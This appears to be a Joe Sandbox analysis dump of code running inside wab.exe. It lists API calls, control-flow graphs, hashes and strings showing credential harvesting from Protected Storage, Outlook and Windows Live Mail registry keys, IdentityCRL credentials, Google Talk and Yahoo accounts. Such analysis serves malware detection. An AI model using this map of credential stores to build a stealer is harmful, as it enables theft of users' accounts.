                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                    • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                    • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                    • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                                  • DeleteObject.GDI32(?), ref: 0040D1A6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                  • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                  • API String ID: 745651260-375988210
                                                  • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                  • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                  • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                  • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                  • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                  • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                  • _mbscpy.MSVCRT ref: 00403E54
                                                  Strings
                                                  • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                  • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                  • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                  • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                  • PStoreCreateInstance, xrefs: 00403C44
                                                  • pstorec.dll, xrefs: 00403C30
                                                  • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                  • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                  • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                  • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                  • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                  • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc_mbscpy
                                                  • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                  • API String ID: 1197458902-317895162
                                                  • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                  • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                  • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                  • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 231 40fb00-40fb35 call 44b090 RegOpenKeyExA 234 40fc37-40fc3d 231->234 235 40fb3b-40fb4f RegOpenKeyExA 231->235 236 40fb55-40fb7e RegQueryValueExA 235->236 237 40fc2d-40fc31 RegCloseKey 235->237 238 40fc23-40fc27 RegCloseKey 236->238 239 40fb84-40fb93 call 404734 236->239 237->234 238->237 239->238 242 40fb99-40fbd1 call 4047a5 239->242 242->238 245 40fbd3-40fbdb 242->245 246 40fc19-40fc1d LocalFree 245->246 247 40fbdd-40fc14 memcpy * 2 call 40f802 245->247 246->238 247->246
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                  • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                  • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                  • memcpy.MSVCRT ref: 0040FBE4
                                                  • memcpy.MSVCRT ref: 0040FBF9
                                                    • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                    • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                    • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                    • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                  • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                  • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                  • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                  • API String ID: 2768085393-2409096184
                                                  • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                  • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                  • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                  • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 249 444c4a-444c66 call 444e38 GetModuleHandleA 252 444c87-444c8a 249->252 253 444c68-444c73 249->253 255 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 252->255 253->252 254 444c75-444c7e 253->254 256 444c80-444c85 254->256 257 444c9f-444ca3 254->257 264 444d02-444d0d __setusermatherr 255->264 265 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 255->265 256->252 259 444c8c-444c93 256->259 257->252 260 444ca5-444ca7 257->260 259->252 262 444c95-444c9d 259->262 263 444cad-444cb0 260->263 262->263 263->255 264->265 268 444da4-444da7 265->268 269 444d6a-444d72 265->269 272 444d81-444d85 268->272 273 444da9-444dad 268->273 270 444d74-444d76 269->270 271 444d78-444d7b 269->271 270->269 270->271 271->272 274 444d7d-444d7e 271->274 275 444d87-444d89 272->275 276 444d8b-444d9c GetStartupInfoA 272->276 273->268 274->272 275->274 275->276 277 444d9e-444da2 276->277 278 444daf-444db1 276->278 279 444db2-444dc6 GetModuleHandleA call 40cf44 277->279 278->279 282 444dcf-444e0f _cexit call 444e71 279->282 283 444dc8-444dc9 exit 279->283 283->282
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                  • String ID:
                                                  • API String ID: 3662548030-0
                                                  • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                  • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                  • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                  • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • memset.MSVCRT ref: 0044430B
                                                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                    • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                    • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                    • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                    • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                                  • memset.MSVCRT ref: 00444379
                                                  • memset.MSVCRT ref: 00444394
                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                  • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                  • strlen.MSVCRT ref: 004443DB
                                                  • _strcmpi.MSVCRT ref: 00444401
                                                  Strings
                                                  • \Microsoft\Windows Mail, xrefs: 00444329
                                                  • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                  • Store Root, xrefs: 004443A5
                                                  • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                  • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                  • API String ID: 832325562-2578778931
                                                  • Opcode ID: f165504987e9a82ab8efa023aeec732962b03d7066b9d51c5ac3c2af033d9fa7
                                                  • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                  • Opcode Fuzzy Hash: f165504987e9a82ab8efa023aeec732962b03d7066b9d51c5ac3c2af033d9fa7
                                                  • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 323 40f67f-40f6bf call 4012ee RegQueryValueExA 321->323 323->315 328 40f6c1-40f6cf 323->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                                                  APIs
                                                  • memset.MSVCRT ref: 0040F567
                                                  • memset.MSVCRT ref: 0040F57F
                                                    • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                  • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                  • memcpy.MSVCRT ref: 0040F652
                                                  • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                  • String ID:
                                                  • API String ID: 2012582556-3916222277
                                                  • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                  • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                  • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                  • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                                                  APIs
                                                  • memset.MSVCRT ref: 004037EB
                                                  • memset.MSVCRT ref: 004037FF
                                                    • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                    • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                    • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                  • strchr.MSVCRT ref: 0040386E
                                                  • _mbscpy.MSVCRT ref: 0040388B
                                                  • strlen.MSVCRT ref: 00403897
                                                  • sprintf.MSVCRT ref: 004038B7
                                                  • _mbscpy.MSVCRT ref: 004038CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                  • String ID: %s@yahoo.com
                                                  • API String ID: 317221925-3288273942
                                                  • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                  • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                  • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                  • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 362 404af5-404afa 356->362 361 404adb 357->361 358->356 359 404ae8-404aea 358->359 359->362 361->358 363 404b13-404b17 362->363 364 404afc-404b12 MessageBoxA 362->364
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                  • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                  • API String ID: 2780580303-317687271
                                                  • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                  • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                  • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                  • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                                                  APIs
                                                  • memset.MSVCRT ref: 00403504
                                                  • memset.MSVCRT ref: 0040351A
                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                  • _mbscpy.MSVCRT ref: 00403555
                                                    • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                    • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                  • _mbscat.MSVCRT ref: 0040356D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _mbscatmemset$Close_mbscpystrlen
                                                  • String ID: InstallPath$Software\Group Mail$fb.dat
                                                  • API String ID: 3071782539-966475738
                                                  • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                  • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                  • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                  • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 374 40ccd7-40cd06 ??2@YAPAXI@Z 375 40cd08-40cd0d 374->375 376 40cd0f 374->376 377 40cd11-40cd24 ??2@YAPAXI@Z 375->377 376->377 378 40cd26-40cd2d call 404025 377->378 379 40cd2f 377->379 381 40cd31-40cd57 378->381 379->381 383 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 381->383 384 40cd59-40cd60 DeleteObject 381->384 384->383
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                  • String ID:
                                                  • API String ID: 2054149589-0
                                                  • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                  • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                  • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                  • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                    • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                    • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                  • memset.MSVCRT ref: 00408620
                                                    • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                  • memset.MSVCRT ref: 00408671
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                  • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                  Strings
                                                  • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                  • String ID: Software\Google\Google Talk\Accounts
                                                  • API String ID: 1366857005-1079885057
                                                  • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                  • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                  • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                  • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 414 40ba28-40ba3a 415 40ba87-40ba9b call 406c62 414->415 416 40ba3c-40ba52 call 407e20 _mbsicmp 414->416 438 40ba9d call 4107f1 415->438 439 40ba9d call 404734 415->439 440 40ba9d call 404785 415->440 441 40ba9d call 403c16 415->441 442 40ba9d call 410a9c 415->442 421 40ba54-40ba6d call 407e20 416->421 422 40ba7b-40ba85 416->422 428 40ba74 421->428 429 40ba6f-40ba72 421->429 422->415 422->416 423 40baa0-40bab3 call 407e30 430 40bab5-40bac1 423->430 431 40bafa-40bb09 SetCursor 423->431 432 40ba75-40ba76 call 40b5e5 428->432 429->432 433 40bac3-40bace 430->433 434 40bad8-40baf7 qsort 430->434 432->422 433->434 434->431 438->423 439->423 440->423 441->423 442->423
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Cursor_mbsicmpqsort
                                                  • String ID: /nosort$/sort
                                                  • API String ID: 882979914-1578091866
                                                  • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                  • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                  • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                  • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                    • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                  • memset.MSVCRT ref: 00410E10
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                  • _mbscpy.MSVCRT ref: 00410E87
                                                    • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                  • API String ID: 889583718-2036018995
                                                  • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                  • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                  • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                  • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                  • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                  • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID:
                                                  • API String ID: 3473537107-0
                                                  • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                  • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                  • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                  • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
